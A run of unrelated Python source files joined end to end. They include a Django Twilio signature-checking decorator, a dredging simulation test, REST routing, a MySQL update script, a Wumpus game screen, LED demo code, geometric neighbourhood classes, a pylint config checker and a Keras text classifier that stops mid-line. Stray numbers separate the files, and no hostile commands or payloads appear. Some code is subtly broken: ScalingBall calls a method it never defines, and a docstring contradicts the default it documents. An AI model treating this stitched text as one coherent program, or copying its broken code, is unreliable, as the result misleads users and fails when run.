use_forgery_protection = getattr( settings, 'DJANGO_TWILIO_FORGERY_PROTECTION', not settings.DEBUG, ) if use_forgery_protection: if request.method not in ['GET', 'POST']: return HttpResponseNotAllowed(request.method) # Forgery check try: validator = RequestValidator(TWILIO_AUTH_TOKEN) url = request.build_absolute_uri() signature = request.META['HTTP_X_TWILIO_SIGNATURE'] except (AttributeError, KeyError): return HttpResponseForbidden() if request.method == 'POST': if not validator.validate(url, request.POST, signature): return HttpResponseForbidden() if request.method == 'GET': if not validator.validate(url, request.GET, signature): return HttpResponseForbidden() # Blacklist check, by default is true check_blacklist = getattr( settings, 'DJANGO_TWILIO_BLACKLIST_CHECK', True ) if check_blacklist: blacklisted_resp = get_blacklisted_response(request) if blacklisted_resp: return blacklisted_resp response = f(request_or_self, *args, **kwargs) if isinstance(response, (text_type, bytes)): return HttpResponse(response, content_type='application/xml') elif isinstance(response, Verb): return HttpResponse(str(response), content_type='application/xml') else: return response return decorator 0 """Test application for the weather plugin.""" import datetime from pathlib import Path import numpy as np import pandas as pd import shapely.geometry import simpy import openclsim.core as core import openclsim.model as model import openclsim.plugins as plugin from .test_utils import assert_log def test_weather(): """Test function for weather plugin.""" simulation_start = datetime.datetime(2009, 1, 1) my_env = simpy.Environment(initial_time=simulation_start.timestamp()) registry = {} Site = type( "Site", ( core.Identifiable, core.Log, core.Locatable, core.HasContainer, core.HasResource, ), {}, ) TransportProcessingResource = type( "TransportProcessingResource", ( core.Identifiable, core.Log, core.ContainerDependentMovable, core.Processor, core.HasResource, ), {}, ) TestMoveActivity = type( "TestMoveActivity", ( plugin.HasWeatherPluginActivity, model.MoveActivity, # the order is critical! ), {}, ) TestShiftActivity = type( "TestShiftActivity", ( plugin.HasWeatherPluginActivity, model.ShiftAmountActivity, # the order is critical! 
), {}, ) location_from_site = shapely.geometry.Point(4.18055556, 52.18664444) # lon, lat location_to_site = shapely.geometry.Point(4.25222222, 52.11428333) # lon, lat from_site = Site( env=my_env, name="Winlocatie", geometry=location_from_site, capacity=120, level=120, ) to_site = Site( env=my_env, name="Dumplocatie", geometry=location_to_site, capacity=120, level=0, ) hopper = TransportProcessingResource( env=my_env, name="Hopper 01", geometry=location_from_site, capacity=4, compute_v=lambda x: 10, ) parent = Path(__file__).resolve().parent metocean_df = pd.read_csv(parent / "data" / "unit_test_weather.csv") metocean_df = metocean_df.set_index( pd.to_datetime(metocean_df["Time"], dayfirst=True) ) metocean_df = metocean_df.sort_index() metocean_df["Hs [m]"] = ( 4 + 1.5 * np.sin(metocean_df[" Hour"] / 24 * 8 * np.pi) + 1.5 * np.sin(metocean_df[" Hour"] / 24 * 6 * np.pi) ) metocean_df = metocean_df.set_index( pd.to_datetime(metocean_df["Time"], dayfirst=True) ) metocean_df = metocean_df.sort_index() metocean_df["ts"] = metocean_df.index.values.astype(float) / 1_000_000_000 sailing_crit = plugin.WeatherCriterion( name="sailing_crit", condition="Hs [m]", maximum=6, window_length=3600, ) loading_crit = plugin.WeatherCriterion( name="loading_crit", condition="Hs [m]", maximum=4.5, window_length=3600, ) single_run = [ TestMoveActivity( env=my_env, name="sailing empty", registry=registry, mover=hopper, destination=from_site, metocean_criteria=sailing_crit, metocean_df=metocean_df, ), TestShiftActivity( env=my_env, name="Loading", registry=registry, processor=hopper, origin=from_site, destination=hopper, amount=4, duration=3600, metocean_criteria=loading_crit, metocean_df=metocean_df, ), TestMoveActivity( env=my_env, name="sailing full", registry=registry, mover=hopper, destination=to_site, metocean_criteria=sailing_crit, metocean_df=metocean_df, ), TestShiftActivity( env=my_env, name="unloading", registry=registry, processor=hopper, origin=hopper, destination=to_site, amount=4, duration=3600, metocean_criteria=loading_crit, metocean_df=metocean_df, ), ] activity = model.SequentialActivity( env=my_env, name="Single run process", ID="6dbbbdf7-4589-11e9-bf3b-b469212bff60", registry=registry, sub_processes=single_run, ) while_activity = model.WhileActivity( env=my_env, name="while", registry=registry, sub_processes=[activity], condition_event=[{"type": "container", "concept": to_site, "state": "full"}], ) model.register_processes([while_activity]) my_env.run() assert my_env.now == 1262737885.6491823 assert_log(hopper) assert_log(while_activity) 0 from django.contrib import admin from django.urls import path, include from rest_framework.routers import DefaultRouter from rest_framework_simplejwt.views import TokenObtainPairView, TokenRefreshView import mainapp.views as mainapp from mainapp.views import PurchasesViewSet, ProductViewSet, CategoryViewSet, UserProfileViewSet from authapp.views import RegisterViewSet router = DefaultRouter() router.register('purchases', PurchasesViewSet) router.register('products', ProductViewSet) router.register('category', CategoryViewSet) router.register('users', UserProfileViewSet) router.register('register', RegisterViewSet) urlpatterns = [ path('api/v1/', include(router.urls)), path('api/v1/token/', TokenObtainPairView.as_view(), name='token_obtain_pair'), path('api/v1/token/refresh/', TokenRefreshView.as_view(), name='token_refresh'), path('product/', mainapp.ProductList.as_view()), path('category/', mainapp.CategoryList.as_view()), path('purchases/', 
mainapp.PurchasesList.as_view()), path('admin/', admin.site.urls), ] from django.apps import AppConfig class BlockchainConfig(AppConfig): name = 'Blockchain' rubens233/cocid_pythonModulo_2/semana4/base_datos/actualiza.py import mysql.connector try: connection = mysql.connector.connect(host='proweb-corp.com', database='prowebco_cocid', user='prowebco_alumnos_cocid', password='') cursor = connection.cursor() print("Antes de actualizar el registro ") sql_select_query = """select * from persona where id = 1""" cursor.execute(sql_select_query) record = cursor.fetchone() print(record) # Update single record now sql_update_query = """Update persona set nombre = 'cambio' where id = 1""" cursor.execute(sql_update_query) connection.commit() print("Actualizacion de registro satisfactorio") print("Despues de la actualizacion de registro") cursor.execute(sql_select_query) record = cursor.fetchone() print(record) except mysql.connector.Error as error: print("Fallo la actualizacion del registro: {}".format(error)) finally: if connection.is_connected(): connection.close() print("MySQL conexion cerrada") import os import pygame from gpath import * from screens import GameScreen from states import * from cores.tile_manager import * from cores.layout.parser import Parser from cores.kb_solve.kb import KB from cores.kb_solve.glu_agent import * class PlayGameScreen(GameScreen): loaded_map = None tile_manager = None def __init__(self, state): GameScreen.__init__(self, state=state) print("Created Game Screen") p = Parser() self.loaded_map = p.load_wumpus_env(gpath.PATH_MAP + 'map_10_10.txt') self.tile_manager = TileManager(self.loaded_map) print("ok") def update(self): self.tile_manager.update_step() def render(self, window): window.fill((0, 0, 0)) self.tile_manager.render_all_ui(window) text_point = self.title_font.render( "Score: " + str(self.tile_manager.glu_agent.score), True, (100, 0, 0)) gold = self.title_font.render( "Gold: " + str(len(self.tile_manager.glu_agent.gold_list)), True, (100, 0, 0)) step = self.title_font.render( "Step: " + str(len(self.tile_manager.log_ui_pos)), True, (200, 0, 0)) safe_nodes = self.title_font.render( "Safe: " + str(len(self.tile_manager.glu_agent.kb.safe_nodes)), True, (200, 0, 0)) window.blit(text_point, (640, 0)) window.blit(gold, (640, 100)) window.blit(step, (640, 200)) window.blit(safe_nodes, (640, 300)) pygame.time.wait(100) def clear(self): pass #!/bin/python import sympy # \int \int_{\sum} \vec{\nabla} \times \vec{F} \dot d\sum = \oint_{\partial \sum} \vec{F}\dot d\vec{r} # http://docs.sympy.org/0.7.3/tutorial/calculus.html#integrals x = sympy.Symbol('x') sympy.integrate(x,x) == sympy.integrate(x,x) examples/drop.py #!/usr/bin/env python import time from random import randint import unicornhat as unicorn print("""Drop Creates a virtual bucket and fills it with randomly coloured dots. If you're using a Unicorn HAT and only half the screen lights up, edit this example and change 'unicorn.AUTO' to 'unicorn.HAT' below. 
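# The persona update above hard-codes the new value and the id inside the SQL
# string.  A parameterized sketch with mysql.connector follows; the connection
# settings are placeholders.
import mysql.connector

def update_persona(nombre: str, persona_id: int) -> None:
    connection = mysql.connector.connect(
        host="localhost", database="ejemplo", user="usuario", password=""
    )
    try:
        cursor = connection.cursor()
        # %s placeholders let the driver escape the values safely
        cursor.execute("UPDATE persona SET nombre = %s WHERE id = %s", (nombre, persona_id))
        connection.commit()
        cursor.execute("SELECT * FROM persona WHERE id = %s", (persona_id,))
        print(cursor.fetchone())  # row after the update
    except mysql.connector.Error as error:
        print("Update failed: {}".format(error))
    finally:
        if connection.is_connected():
            connection.close()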
""") unicorn.set_layout(unicorn.AUTO) unicorn.rotation(0) unicorn.brightness(0.5) uh_width,uh_height=unicorn.get_shape() heights = [] def setup(): global heights heights = [] for b in range(0, (uh_width-2)): heights.append(0) unicorn.off() for b in range(0, uh_height): unicorn.set_pixel(0, b, 255, 255, 255) for b in range(0, uh_height): unicorn.set_pixel((uh_width-1), b, 255, 255, 255) for b in range(1, (uh_width-1)): unicorn.set_pixel(b, 0, 255, 255, 255) unicorn.show() def drop_ball(): ball_colour = [randint(100, 255), randint(100, 255), randint(100, 255)] ball_column = randint(0, (uh_width-3)) while heights[ball_column] == (uh_height-1): ball_column = randint(0, (uh_width-3)) height = heights[ball_column] ball_y = (uh_height-1) unicorn.set_pixel(ball_column + 1, ball_y, ball_colour[0], ball_colour[1], ball_colour[2]) unicorn.show() dropcount = (uh_height-2) - height for y in range(0, dropcount): unicorn.set_pixel(ball_column + 1, ball_y, 0, 0, 0) ball_y -= 1 unicorn.set_pixel(ball_column + 1, ball_y, ball_colour[0], ball_colour[1], ball_colour[2]) unicorn.show() time.sleep(0.02) heights[ball_column] += 1 setup() while True: for i in range(0, (uh_width-2)*(uh_height-1)): drop_ball() time.sleep(1) setup() 1-10 class Comic: def __init__(self, num: int, title: str, alt: str, img: str) -> None: self.num = num self.title = title self.alt = alt self.img = img """ Classes used to model various geometric shapes centered around the origin Defines the Neighbourhood Abstract Base Class that can be used to create custom geometric shapes Subclasses of Neighbourhood can be used with the TableExtension and the PointcloudExtension class in the hrosailing.pipeline module """ from abc import ABC, abstractmethod from typing import Callable import numpy as np from scipy.spatial import ConvexHull from ._utils import scaled_euclidean_norm class NeighbourhoodInitializationException(Exception): """Exception raised if an error occurs during initialization of a Neighbourhood """ class Neighbourhood(ABC): """Base class for all neighbourhood classes Abstract Methods ---------------- is_contained_in(self, pts) """ @abstractmethod def is_contained_in(self, pts): """This method should be used, given certain points, to determine which of these points lie in the neighbourhood and which do not, by producing a boolean array of the same size as pts """ class Ball(Neighbourhood): """A class to describe a closed 2-dimensional ball centered around the origin, ie { x in R^2 : ||x|| <= r } Parameters ---------- norm : function or callable, optional The norm for which the ball is described, ie ||.|| If nothing is passed, it will default to a scaled version of ||.||_2 radius : positive int or float, optional The radius of the ball, ie r Defaults to `0.05` Raises ------ NeighbourhoodInitializationException If radius is nonpositive """ def __init__( self, norm: Callable = scaled_euclidean_norm, radius=0.05, ): if radius <= 0: raise NeighbourhoodInitializationException( "`radius` is not positive" ) self._norm = norm self._radius = radius def __repr__(self): return f"Ball(norm={self._norm.__name__}, radius={self._radius})" def is_contained_in(self, pts): """Checks given points for membership. 
Parameters ---------- pts : array_like of shape (n, 2) Points that will be checked for membership Returns ------- mask : numpy.ndarray of shape (n, ) Boolean array describing which of the input points is a member of the neighbourhood """ pts = np.asarray(pts) return self._norm(pts) <= self._radius class ScalingBall(Neighbourhood): """A class to represent a closed 2-dimensional ball centered around the origin, ie { x in R^2 : ||x|| <= r }, where the radius r will be dynamically determined, such that there are always a certain amount of given points contained in the ball Parameters ---------- min_pts : positive int The minimal amount of certain given points that should be contained in the scaling ball max_pts : positive int The "maximal" amount of certain given points that should be contained in the scaling ball. Mostly used for initial guess of a "good" radius. Also to guarantee that on average, the scaling ball will contain (min_pts + max_pts) / 2 points of certain given points It is also unlikely that the scaling ball will contain more than max_pts points norm : function or callable, optional The norm for which the scaling ball is described, ie ||.|| If nothing is passed, it will default to a scaled version of ||.||_2 Raises ------ NeighbourhoodInitializationException - If min_pts or max_pts are nonpositive - If max_pts is less than or equal to min_pts """ def __init__( self, min_pts, max_pts, norm: Callable = scaled_euclidean_norm, ): if min_pts <= 0: raise NeighbourhoodInitializationException( "`min_pts` is not positive" ) if max_pts <= 0: raise NeighbourhoodInitializationException( "`max_pts` is not positive" ) if max_pts <= min_pts: raise NeighbourhoodInitializationException( "`max_pts` is smaller than `min_pts`" ) self._min_pts = min_pts self._max_pts = max_pts self._norm = norm self._avg = (min_pts + max_pts) / 2 self._n_pts = None self._area = None self._radius = None def __repr__(self): return f"ScalingBall(min_pts={self._min_pts}, max_pts={self._max_pts})" def is_contained_in(self, pts): """Checks given points for membership, and scales ball so that at least min_pts points are contained in it Parameters ---------- pts : array_like of shape (n, 2) Points that will be checked for membership Returns ------- points_in_ball : boolean numpy.ndarray of shape (n, ) Boolean array describing which of the input points is a member of the neighbourhood """ pts = np.asarray(pts) self._guess_initial_suitable_radius(pts) dist = self._norm(pts) while True: in_ball = dist <= self._radius if self._enough_points(in_ball): return in_ball self._expand_radius(dist, in_ball) def _guess_initial_suitable_radius(self, pts): self._n_pts = pts.shape[0] self._area = ConvexHull(pts).volume self._radius = np.sqrt(self._avg * self._area / (np.pi * self._n_pts)) def _enough_points_in_ball(self, pts_in_ball): return self._min_pts <= len(pts_in_ball[pts_in_ball]) def _expand_radius(self, dist, pts_in_ball): dist_of_not_included_pts = dist[~pts_in_ball] self._radius = np.min(dist_of_not_included_pts) class Ellipsoid(Neighbourhood): """A class to represent a closed d-dimensional ellipsoid centered around the origin, ie T(B), where T is an invertible linear transformation, and B is a closed d-dimensional ball, centered around the origin. 
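# The ScalingBall above guesses a starting radius from the point density (the
# expected number of points in a disc of radius r is about n * pi * r^2 / area,
# so r = sqrt(avg * area / (pi * n))) and then grows the radius to the nearest
# excluded point until at least min_pts points lie inside.  A standalone sketch
# of that loop with the plain Euclidean norm:
import numpy as np
from scipy.spatial import ConvexHull

def scaling_radius(pts, min_pts=10, max_pts=20):
    pts = np.asarray(pts)
    dist = np.linalg.norm(pts, axis=1)
    area = ConvexHull(pts).volume             # the "volume" of a 2-d hull is its area
    avg = (min_pts + max_pts) / 2
    radius = np.sqrt(avg * area / (np.pi * len(pts)))
    while np.count_nonzero(dist <= radius) < min_pts:
        radius = np.min(dist[dist > radius])  # expand to the closest excluded point
    return radius

# Example: 200 points around the origin; the returned radius encloses >= 10 of them.
rng = np.random.default_rng(0)
print(scaling_radius(rng.normal(size=(200, 2))))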
It will be represented using the equivalent formulation: { x in R^2 : ||T^-1 x|| <= r } Parameters ---------- lin_trans: array_like of shape (2,2), optional The linear transformation which transforms the ball into the given ellipsoid, ie T If nothing is passed, it will default to I_2, the 2x2 unit matrix, ie the ellipsoid will be a ball norm : function or callable, optional The norm for which the ellipsoid is described, ie ||.|| If nothing is passed, it will default to a scaled version of ||.||_2 radius : positive int or float, optional The radius of the ellipsoid, ie r Defaults to 0.05 Raises ------ NeighbourhoodInitializationException - If radius is nonpositive - If lin_trans is not a (2,2)-array or is not invertible """ def __init__( self, lin_trans=None, norm: Callable = scaled_euclidean_norm, radius=0.05, ): if lin_trans is None: lin_trans = np.eye(2) lin_trans = np.asarray_chkfinite(lin_trans) if lin_trans.shape != (2, 2): raise NeighbourhoodInitializationException( "`lin_trans` has incorrect shape" ) if not np.linalg.det(lin_trans): raise NeighbourhoodInitializationException( "`lin_trans` is singular" ) if radius <= 0: raise NeighbourhoodInitializationException( "`radius` is not positive" ) self._T = np.linalg.inv(lin_trans) self._norm = norm self._radius = radius def __repr__(self): return ( f"Ellipsoid(lin_trans={self._T}, " f"norm={self._norm.__name__}, radius={self._radius})" ) def is_contained_in(self, pts): """Checks given points for membership. Parameters ---------- pts : array_like of shape (n, 2) Points that will be checked for membership Returns ------- mask : numpy.ndarray of shape (n, ) Boolean array describing which of the input points is a member of the neighbourhood """ pts = np.asarray(pts) pts = self._transform_ellipsoid_to_ball(pts) return self._norm(pts) <= self._radius def _transform_ellipsoid_to_ball(self, pts): return (self._T @ pts.T).T class Cuboid(Neighbourhood): """A class to represent a d-dimensional closed cuboid, ie { x in R^2 : |x_i| <= b_i, i=1,2 } Parameters ---------- norm : function or callable, optional The 1-d norm used to measure the length of the x_i, ie |.| If nothing is passed, it will default to the absolute value |.| dimensions: subscriptable of length 2, optional The 'length' of the 'sides' of the cuboid, ie the b_i If nothing is passed, it will default to (0.05, 0.05) """ def __init__( self, norm: Callable = scaled_euclidean_norm, dimensions=(0.05, 0.05), ): self._norm = norm self._size = dimensions def __repr__(self): return f"Cuboid(norm={self._norm.__name__}, dimensions={self._size})" def is_contained_in(self, pts): """Checks given points for membership. Parameters ---------- pts : array_like of shape (n, 2) Points that will be checked for membership Returns ------- mask : numpy.ndarray of shape (n, ) Boolean array describing which of the input points is a member of the neighbourhood """ mask = ( np.ones((pts.shape[0],), dtype=bool) & (self._norm(pts[:, 0]) <= self._size[0]) & (self._norm(pts[:, 1]) <= self._size[1]) ) return mask class Polytope(Neighbourhood): """A class to represent a general 2-dimensional polytope, ie the convex hull P = conv(x_1, ..., x_n) of some n points x_1 ,..., x_n or equivalent as the (bounded) intersection of m half spaces P = { x in R^2 : Ax <= b } Parameters ---------- mat: array_like of shape (m, 2), optional matrix to represent the normal vectors a_i of the half spaces, ie A = (a_1, ... 
, a_m)^t If nothing is passed, it will default to (I_2, -I_2)^t, where I_d is the d-dimensional unit matrix b: array_like of shape (m, ), optional vector to represent the ... b_i of the half spaces, ie b = (b_1, ... , b_m)^t If nothing is passed, it will default to (0.05,...,0.05) Raises ------ NeighbourhoodException If mat and b are not of matching shape Warning ------- Does not check wether the polytope given by mat and b is a polytope, ie if P is actually bounded """ def __init__( self, mat=np.row_stack((np.eye(2), -np.eye(2))), b=0.05 * np.ones(4) ): # NaN's or infinite values can't be handled mat = np.asarray_chkfinite(mat) b = np.asarray_chkfinite(b) if mat.ndim != 2 or mat.shape[1] != 2: raise NeighbourhoodInitializationException( "`mat` has incorrect shape" ) if b.ndim != 1 or b.shape[0] != mat.shape[0]: raise NeighbourhoodInitializationException( "`b` has incorrect shape" ) self._mat = mat self._b = b def __repr__(self): return f"Polytope(mat={self._mat}, b={self._b})" def is_contained_in(self, pts): """Checks given points for membership. Parameters ---------- pts : array_like of shape (n, 2) Points that will be checked for membership Returns ------- mask : numpy.ndarray of shape (n, ) Boolean array describing which of the input points is a member of the neighbourhood """ pts = np.asarray(pts) mask = np.ones((pts.shape[0],), dtype=bool) for ineq, bound in zip(self._mat, self._b): mask = mask & (ineq @ pts.T <= bound) return mask from pathlib import Path TOXINI_FILE = Path("tox.ini") PYPROJECTTOML_FILE = Path("pyproject.toml") GLOBAL_DISABLES = { "invalid-name", "fixme", "bad-continuation", "no-else-raise", "no-else-return", "no-member", } # Parse ./tox.ini tox_lines = TOXINI_FILE.read_text().splitlines() tox_pylint_lines = [ l for l in tox_lines if l.strip().startswith("pylint") and "--disable" in l ] tox_disables = {i for l in tox_pylint_lines for i in l.split('"')[1].split(",")} # Parse ./pyproject.toml pyproject_lines = PYPROJECTTOML_FILE.read_text().splitlines() is_in_disable_string = False pyproject_disables = set() for line in pyproject_lines: if is_in_disable_string and line.startswith('"""'): is_in_disable_string = False if is_in_disable_string and line: pyproject_disables.add(line.strip().strip(",")) if line.startswith("disable"): is_in_disable_string = True # Check correctness and raise errors try: in_pyproject_butnot_tox = pyproject_disables.difference(tox_disables).difference( GLOBAL_DISABLES ) assert not in_pyproject_butnot_tox except AssertionError: raise Exception( f""" The following pylint messages seem to be disabled in `./pyproject.toml`, but not in any of the pylint calls in `./tox.ini`: {in_pyproject_butnot_tox}. This could have two reasons with different solutions: 1. You fixed one or many pylint errors in one of the modules and there is no module left that needs this specific message disabled. Then, please also remove it from the `./pyproject.toml` file such that pylint uses the most up-to-date configuration file. 2. You added a new global exception to `./pyproject.toml` after deciding that this is a message that we do not want to enforce anywhere currently. Then, please add this exception also to the `GLOBAL_DISABLES` variable in this this python script (`./github/workflows/pylint_check.py`). If you are not sure what exactly you are supposed to do, or if you think that this message is wrong please feel free to ping @nathanaelbosch. 
""" ) try: in_tox_butnot_pyproject = tox_disables.difference(pyproject_disables) assert not in_tox_butnot_pyproject except AssertionError: raise Exception( f""" The following pylint messages seem to be disabled in `./tox.ini`, but not in `./pyproject.toml`: {in_tox_butnot_pyproject}. Please make sure to add them to `./pyproject.toml` such that pylint does not raise any warnings that are not supposed to be fixed right now. If you are not sure what exactly you are supposed to do, or if you think that this message is wrong please feel free to ping @nathanaelbosch. """ ) print( "The pylint exceptions in `./tox.ini` and `./pyproject.toml` seem to be correctly synchronized." ) from cmd3.shell import command from cmd3.console import Console import os import sys class clear: # # CLEAR # def activate_clear(self): """activates the clear command""" pass @command def do_clear(self, arg, arguments): """ Usage: clear Clears the screen.""" sys.stdout.write(os.popen('clear').read()) @command def do_banner(self, arg, arguments): """ :: Usage: banner [-c CHAR] [-n WIDTH] [-i INDENT] [-r COLOR] TEXT Arguments: TEXT The text message from which to create the banner CHAR The character for the frame. WIDTH Width of the banner INDENT indentation of the banner COLOR the color Options: -c CHAR The character for the frame. [default: #] -n WIDTH The width of the banner. [default: 70] -i INDENT The width of the banner. [default: 0] -r COLOR The color of the banner. [default: BLACK] Prints a banner form a one line text message. """ print arguments n = int(arguments['-n']) c = arguments['-c'] i = int(arguments['-i']) color = arguments['-r'].upper() Console._print(color, "", i * " " + (n-i) * c) Console._print(color, "", i * " " + c + " " + arguments['TEXT']) Console._print(color, "", i * " " + (n-i) * c) # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved import torch from torch import nn from detectron2.config import CfgNode from detectron2.layers import ConvTranspose2d, interpolate from ...structures import DensePoseEmbeddingPredictorOutput from ..utils import initialize_module_params from .registry import DENSEPOSE_PREDICTOR_REGISTRY @DENSEPOSE_PREDICTOR_REGISTRY.register() class DensePoseEmbeddingPredictor(nn.Module): """ Last layers of a DensePose model that take DensePose head outputs as an input and produce model outputs for continuous surface embeddings (CSE). 
""" def __init__(self, cfg: CfgNode, input_channels: int): """ Initialize predictor using configuration options Args: cfg (CfgNode): configuration options input_channels (int): input tensor size along the channel dimension """ super().__init__() dim_in = input_channels n_segm_chan = cfg.MODEL.ROI_DENSEPOSE_HEAD.NUM_COARSE_SEGM_CHANNELS embed_size = cfg.MODEL.ROI_DENSEPOSE_HEAD.CSE.EMBED_SIZE kernel_size = cfg.MODEL.ROI_DENSEPOSE_HEAD.DECONV_KERNEL # coarse segmentation self.coarse_segm_lowres = ConvTranspose2d( dim_in, n_segm_chan, kernel_size, stride=2, padding=int(kernel_size / 2 - 1) ) # embedding self.embed_lowres = ConvTranspose2d( dim_in, embed_size, kernel_size, stride=2, padding=int(kernel_size / 2 - 1) ) self.scale_factor = cfg.MODEL.ROI_DENSEPOSE_HEAD.UP_SCALE initialize_module_params(self) def interp2d(self, tensor_nchw: torch.Tensor): """ Bilinear interpolation method to be used for upscaling Args: tensor_nchw (tensor): tensor of shape (N, C, H, W) Return: tensor of shape (N, C, Hout, Wout), where Hout and Wout are computed by applying the scale factor to H and W """ return interpolate( tensor_nchw, scale_factor=self.scale_factor, mode="bilinear", align_corners=False ) def forward(self, head_outputs): """ Perform forward step on DensePose head outputs Args: head_outputs (tensor): DensePose head outputs, tensor of shape [N, D, H, W] """ embed_lowres = self.embed_lowres(head_outputs) coarse_segm_lowres = self.coarse_segm_lowres(head_outputs) embed = self.interp2d(embed_lowres) coarse_segm = self.interp2d(coarse_segm_lowres) return DensePoseEmbeddingPredictorOutput(embedding=embed, coarse_segm=coarse_segm) 0 # -*- coding: utf-8 -*- """ Created on Sat Apr 11 15:18:39 2020 @author: kaisa """ from sqlalchemy import create_engine import matplotlib.pyplot as plt import io import os import re import numpy as np import pandas as pd from nltk.tokenize import word_tokenize from nltk.stem import WordNetLemmatizer from nltk.corpus import stopwords from sklearn.pipeline import Pipeline from sklearn.metrics import confusion_matrix from sklearn.model_selection import train_test_split from sklearn.ensemble import RandomForestClassifier from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer from sklearn.metrics import accuracy_score, f1_score, precision_score, recall_score from keras.preprocessing import text, sequence from keras.preprocessing.text import Tokenizer from keras.preprocessing.sequence import pad_sequences from keras.models import Sequential from keras.layers import Dense, Embedding, LSTM, SpatialDropout1D, Input, Bidirectional, GRU, Convolution1D, GlobalMaxPool1D from keras import layers from sklearn.model_selection import train_test_split from keras.utils.np_utils import to_categorical from keras.callbacks import EarlyStopping from keras.layers import Dropout from keras import layers, models, optimizers import re from nltk.corpus import stopwords from nltk import word_tokenize STOPWORDS = set(stopwords.words('english')) url_regex = 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+' def load_data(database_filename): # load data engine = create_engine('sqlite:///' + database_filename) df = pd.read_sql_table('f8_disater_response_data', engine) X = df['message'] y = df.drop(columns=['id', 'message','original','genre']) return X, y def tokenize(text): # remove urls detected_urls = re.findall(url_regex, text) for url in detected_urls: text = text.replace(url, "urlplaceholder") # Normalize text text = re.sub(r"[^a-zA-Z0-9]", " ", 
text.lower()) #tokenize tokens = word_tokenize(text) # Remove stop words tokens = [w for w in tokens if w not in stopwords.words("english")] # Lemmatize lemmatizer = WordNetLemmatizer() clean_tokens = [] for tok in tokens: clean_tok = lemmatizer.lemmatize(tok).strip() clean_tokens.append(clean_tok) return ' '.join(clean_tokens) def display_results(y_test, y_pred): y_pred = pd.DataFrame(data=y_pred, columns=y_test.columns) # confusion matrix confusion_mat = np.zeros((2,2)) for c in y_test.columns: confusion_mat += confusion_matrix(y_test[c], y_pred[c]) confusion_mat = np.array(confusion_mat, dtype=np.float) / np.sum(confusion_mat) # accuracy accuracy = {c: (y_test[c]==y_pred[c]).mean() for c in y_test.columns} print("Confusion Matrix:\n", confusion_mat) print("Scores:") scores = {'f1': f1_score, 'precision': precision_score, 'recall': recall_score} for c in y_test.columns: t = '{:25}'.format(c+':') for name, score in scores.items(): try: t += '{}={:.2f} '.format(name, score(y_test[c], y_pred[c])) #, zero_division=1 except: t += 'error' pass print(t) # for c, v in accuracy.items(): # print(' {}: {:.2f}'.format(c, v)) def check_recall(y_train, y_test, y_pred): recall = [recall_score(y_test[c], y_pred[c]) for c in y_test.columns] occurance = [(np.sum(y_test[c])+np.sum(y_train[c])) / (len(y_test)+len(y_train)) for c in y_test.columns] labels = y_test.columns.tolist() labels = [x for _,x in sorted(zip(recall,labels))] occurance = [x for _,x in sorted(zip(recall,occurance))] recall.sort() return recall, occurance, labels X, y = load_data('D:\\Datensicherung\\Projekte\\Udacity_DataScience\\Disaster_response_project\\data\\database.db') #y = y[['hospitals', 'shops', 'aid_centers', 'other_infrastructure', 'fire']] X = [tokenize(text) for text in X] X_train, X_test, y_train, y_test = train_test_split(X, y) # #pipeline = Pipeline([ # ('vect', CountVectorizer(tokenizer=tokenize)), # ('tfidf', TfidfTransformer()) #]) # ## train classifier #res = pipeline.fit_transform(X_train, y_train) def load_vectors(fname): fin = io.open(fname, 'r', encoding='utf-8', newline='\n', errors='ignore') n, d = map(int, fin.readline().split()) data = {} for line in fin: tokens = line.rstrip().split(' ') data[tokens[0]] = np.asarray(tokens[1:], dtype='float32') return data # load the pre-trained word-embedding vectors embeddings_index = {} for i, line in enumerate(open('D:\\Datensicherung\\Projekte\\Udacity_DataScience\\data\\wiki-news-300d-1M.vec')): if i!=0: values = line.split() embeddings_index[values[0]] = np.asarray(values[1:], dtype='float32') embeddings_index = load_vectors('D:\\Datensicherung\\Projekte\\Udacity_DataScience\\data\\wiki-news-300d-1M.vec') # create a tokenizer token = text.Tokenizer() token.fit_on_texts(X_train) word_index = token.word_index # convert text to sequence of tokens and pad them to ensure equal length vectors train_seq_x = sequence.pad_sequences(token.texts_to_sequences(X_train), maxlen=50) valid_seq_x = sequence.pad_sequences(token.texts_to_sequences(X_test), maxlen=50) # create token-embedding mapping embedding_matrix = np.zeros((len(word_index) + 1, 300)) for word, i in word_index.items(): embedding_vector = embeddings_index.get(word) if embedding_vector is not None: embedding_matrix[i] = embedding_vector def create_rcnn(X): model = Sequential() # Add an Input Layer #input_layer = layers.Input((70, )) #model.add(Input((X.shape[1], ))) # Add the word embedding Layer #embedding_layer = layers.Embedding(len(word_index) + 1, 300, weights=[embedding_matrix], trainable=False)(input_layer) 
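# (The commented-out lines in this function are the Keras functional-API form of the same network; the Sequential model.add() calls that follow build the equivalent embedding -> spatial dropout -> bidirectional GRU -> Conv1D -> global max pooling -> dense stack.)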
#embedding_layer = layers.SpatialDropout1D(0.3)(embedding_layer) model.add(Embedding(len(word_index) + 1, 300, weights=[embedding_matrix], trainable=False, input_length=X.shape[1])) model.add(SpatialDropout1D(0.3)) # Add the recurrent layer #rnn_layer = layers.Bidirectional(layers.GRU(50, return_sequences=True))(embedding_layer) model.add(Bidirectional(GRU(50, return_sequences=True))) # Add the convolutional Layer #conv_layer = layers.Convolution1D(100, 3, activation="relu")(embedding_layer) model.add(Convolution1D(100, 3, activation="relu")) # Add the pooling Layer #pooling_layer = layers.GlobalMaxPool1D()(conv_layer) model.add(GlobalMaxPool1D()) # Add the output Layers #output_layer1 = layers.Dense(50, activation="relu")(pooling_layer) #output_layer1 = layers.Dropout(0.25)(output_layer1) #output_layer2 = layers.Dense(1, activation="sigmoid")(output_layer1) model.add(Dense(50, activation="relu")) model.add(Dropout(0.25)) model.add(Dense(36, activation="sigmoid")) #36 # Compile the model #model = models.Model(inputs=input_layer, outputs=output_layer2) model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy']) return model epochs = 5 batch_size = 64 model = create_rcnn(train_seq_x) history = model.fit(train_seq_x, y_train, epochs=epochs, batch_size=batch_size, validation_data=(valid_seq_x, y_test)) plt.title('Loss') plt.plot(history.history['loss'], label='train') plt.plot(history.history['val_loss'], label='test') plt.legend() plt.show() y_pred = model.predict(valid_seq_x) y_pred = np.round(y_pred) #y_pred[y_pred>=0.3] = 1 #y_pred[y_pred<0.3] = 0 y_pred = pd.DataFrame(data=y_pred, columns=y_test.columns) y_pred.reset_index(inplace=True, drop=True) display_results(y_test.reset_index(drop=True), y_pred) recall, 